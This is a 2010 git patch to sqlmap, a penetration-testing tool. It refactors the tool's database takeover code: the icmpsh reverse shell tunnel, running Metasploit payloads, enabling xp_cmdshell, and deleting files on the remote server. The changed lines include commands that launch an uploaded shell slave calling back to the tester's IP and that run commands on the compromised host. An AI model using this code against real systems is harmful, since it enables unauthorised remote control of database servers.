From 4f8e9da1b624ef3f1177fd5d0ff3f1aaae9fc26b Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Thu, 28 Oct 2010 00:19:40 +0000 Subject: [PATCH] Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. --- extra/icmpsh/icmpsh_m.py | 2 +- lib/takeover/abstraction.py | 6 ++--- lib/takeover/icmpsh.py | 36 ++++++-------------------- lib/takeover/metasploit.py | 6 ++--- lib/takeover/registry.py | 10 +++---- lib/takeover/xp_cmdshell.py | 16 +++++------- plugins/dbms/mssqlserver/filesystem.py | 24 ++++++----------- plugins/generic/filesystem.py | 18 ++++--------- plugins/generic/misc.py | 10 +++---- plugins/generic/takeover.py | 8 +++--- 10 files changed, 47 insertions(+), 89 deletions(-) diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index ee7b82355..d37b31885 100755 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -93,7 +93,7 @@ def main(src, dst): except: pass - if cmd == 'exit': + if cmd == 'exit\n': return # Set sequence number and identifier diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 3dcbd7515..47ccaebcd 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -32,7 +32,7 @@ class Abstraction(Web, UDF, xp_cmdshell): Web.__init__(self) xp_cmdshell.__init__(self) - def execCmd(self, cmd, silent=False, forgeCmd=False): + def execCmd(self, cmd, silent=False): if self.webBackdoorUrl and not kb.stackedTest: self.webBackdoorRunCmd(cmd) @@ -40,7 +40,7 @@ class Abstraction(Web, UDF, xp_cmdshell): self.udfExecCmd(cmd, silent=silent) elif kb.dbms == "Microsoft SQL Server": - self.xpCmdshellExecCmd(cmd, silent, forgeCmd) + self.xpCmdshellExecCmd(cmd, silent) else: errMsg = "Feature not yet implemented for the back-end DBMS" @@ -79,7 +79,7 @@ class Abstraction(Web, UDF, xp_cmdshell): else: dataToStdout("No output\n") else: - self.execCmd(cmd, forgeCmd=True) + self.execCmd(cmd) def shell(self): if self.webBackdoorUrl and not kb.stackedTest: diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 102b961b4..4872a96d0 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -7,40 +7,21 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/) See the file 'doc/COPYING' for copying permission """ -import codecs import os -import re -import stat -import sys import time -from select import select -from subprocess import PIPE -from subprocess import Popen as execute - from extra.icmpsh.icmpsh_m import main as icmpshmaster -from lib.core.common import dataToStdout from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes -from lib.core.common import pollProcess -from lib.core.common import randomRange from lib.core.common import randomStr from lib.core.common import readInput from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths -from lib.core.exception import sqlmapDataException -from lib.core.exception import sqlmapFilePathException -from lib.core.subprocessng import blockingReadFromFD -from lib.core.subprocessng import blockingWriteToFD -from lib.core.subprocessng import setNonBlocking -from lib.request.connect import Connect as Request -from lib.takeover.upx import upx class ICMPsh: @@ -81,22 +62,18 @@ class ICMPsh: infoMsg = "running icmpsh slave remotely" logger.info(infoMsg) - self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr) - - cmd = "%s &" % self.__icmpshSlaveCmd - - if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct): - cmd = self.xpCmdshellForgeCmd(cmd) + cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr) self.execCmd(cmd, silent=True) def uploadIcmpshSlave(self, web=False): self.__randStr = randomStr(lowercase=True) + self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr if web: - self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr) + self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase) else: - self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr) + self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase) self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote)) @@ -115,4 +92,7 @@ class ICMPsh: debugMsg = "icmpsh master exited" logger.debug(debugMsg) - self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True) + time.sleep(1) + self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True) + time.sleep(1) + self.delRemoteFile(self.__icmpslaveRemote) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 4ddbd48e6..b0f33ddd2 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -397,9 +397,6 @@ class Metasploit: cmd = "%s &" % self.exeFilePathRemote - if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct): - cmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(cmd, silent=True) def __loadMetExtensions(self, proc, metSess): @@ -648,7 +645,8 @@ class Metasploit: logger.debug(debugMsg) if not goUdf: - self.delRemoteFile(self.exeFilePathRemote, doubleslash=True) + time.sleep(1) + self.delRemoteFile(self.exeFilePathRemote) def smb(self): self.__initVars() diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 348c57213..11ca94953 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -87,7 +87,7 @@ class Registry: if index != -1: data = data[index + len(pattern):] - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.delRemoteFile(self.__batPathRemote) return data @@ -101,8 +101,8 @@ class Registry: debugMsg += "to registry key '%s'" % self.__regKey logger.debug(debugMsg) - self.execCmd(cmd=self.__batPathRemote, forgeCmd=True) - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.execCmd(cmd=self.__batPathRemote) + self.delRemoteFile(self.__batPathRemote) def delRegKey(self, regKey, regValue): self.__operation = "delete" @@ -114,5 +114,5 @@ class Registry: debugMsg += "from registry key '%s'" % self.__regKey logger.debug(debugMsg) - self.execCmd(cmd=self.__batPathRemote, forgeCmd=True) - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.execCmd(cmd=self.__batPathRemote) + self.delRemoteFile(self.__batPathRemote) diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 0a2cc0599..390617974 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -36,7 +36,7 @@ class xp_cmdshell: cmd += "RECONFIGURE WITH OVERRIDE; " cmd += "EXEC master..sp_configure 'ole automation procedures', 1; " cmd += "RECONFIGURE WITH OVERRIDE; " - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) self.__randStr = randomStr(lowercase=True) @@ -51,7 +51,7 @@ class xp_cmdshell: if kb.dbmsVersion[0] in ( "2005", "2008" ): cmd += " RECONFIGURE WITH OVERRIDE;" - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) def __xpCmdshellConfigure2005(self, mode): debugMsg = "configuring xp_cmdshell using sp_configure " @@ -85,10 +85,10 @@ class xp_cmdshell: else: cmd = self.__xpCmdshellConfigure2000(mode) - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) def __xpCmdshellCheck(self): - query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2)) + query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2)) duration = timeUse(query) if duration >= conf.timeSec: @@ -102,17 +102,15 @@ class xp_cmdshell: return forgedCmd - def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False): - if forgeCmd: - cmd = self.xpCmdshellForgeCmd(cmd) - + def xpCmdshellExecCmd(self, cmd, silent=False): + cmd = self.xpCmdshellForgeCmd(cmd) inject.goStacked(cmd, silent) def xpCmdshellEvalCmd(self, cmd, first=None, last=None): self.getRemoteTempPath() tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) - cmd = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile)) + cmd = "%s > %s" % (cmd, tmpFile) self.xpCmdshellExecCmd(cmd) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index fb46cf6e1..b5aae1cc6 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -146,13 +146,10 @@ class Filesystem(GenericFilesystem): logger.debug("moving binary file %s to %s" % (sFile, dFile)) - commands = ("cd \"%s\"" % tmpPath, - "ren %s %s" % (chunkName, dFileName), - "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) + commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) + complComm = " & ".join(command for command in commands) - self.execCmd(forgedCmd) + self.execCmd(complComm) else: infoMsg = "the %s file is bigger than %d " % (fileType, debugSize) @@ -177,13 +174,10 @@ class Filesystem(GenericFilesystem): infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName) logger.debug(infoMsg) - commands = ("cd %s" % tmpPath, - copyCmd, - "del /F %s" % chunkName) - complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) + commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName) + complComm = " & ".join(command for command in commands) - self.execCmd(forgedCmd) + self.execCmd(complComm) logger.info("file chunk %d written" % counter) @@ -193,12 +187,10 @@ class Filesystem(GenericFilesystem): logger.debug("moving binary file %s to %s" % (sFile, dFile)) - commands = ("cd %s" % tmpPath, - "move /Y %s %s" % (dFileName, dFile)) + commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) - self.execCmd(forgedCmd) + self.execCmd(complComm) if confirm: self.askCheckWrittenFile(wFile, dFile, fileType) diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index ca0067b38..142c35f01 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -205,26 +205,18 @@ class Filesystem: charCounter += len(forgedScrLine) if charCounter >= maxLen: - forgedCmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(forgedCmd) + self.execCmd(cmd) - cmd = "" + cmd = "" charCounter = 0 if cmd: - forgedCmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(forgedCmd) - - commands = ( - "cd %s" % tmpPath, - "debug < %s" % randScr, - "del /F /Q %s" % randScr - ) + self.execCmd(cmd) + commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr ) complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) - self.execCmd(forgedCmd, silent=True) + self.execCmd(complComm, silent=True) return chunkName diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 619bd4835..629930b30 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -75,20 +75,16 @@ class Miscellaneous: kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False) kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "") - def delRemoteFile(self, tempFile, doubleslash=False): + def delRemoteFile(self, tempFile): self.checkDbmsOs() if kb.os == "Windows": - if doubleslash: - tempFile = tempFile.replace("/", "\\\\") - else: - tempFile = posixToNtSlashes(tempFile) - + tempFile = posixToNtSlashes(tempFile) cmd = "del /F /Q %s" % tempFile else: cmd = "rm -f %s" % tempFile - self.execCmd(cmd, forgeCmd=True) + self.execCmd(cmd) def createSupportTbl(self, tblName, tblField, tblType): inject.goStacked("DROP TABLE %s" % tblName) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 62b84ff93..15c78b925 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -153,6 +153,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): errMsg += "is unlikely to receive commands send from you" logger.error(errMsg) + self.sysUdfs.pop("sys_bineval") + if kb.stackedTest or conf.direct: web = False @@ -207,7 +209,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): elif tunnel == 2: self.uploadIcmpshSlave(web=web) self.icmpPwn() - + elif not kb.stackedTest and kb.dbms == "MySQL": web = True @@ -244,8 +246,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if not web or (web and self.webBackdoorUrl is not None): self.pwn(goUdf) - if not conf.cleanup: - self.cleanup() + if not conf.cleanup: + self.cleanup() def osSmb(self): stackedTest()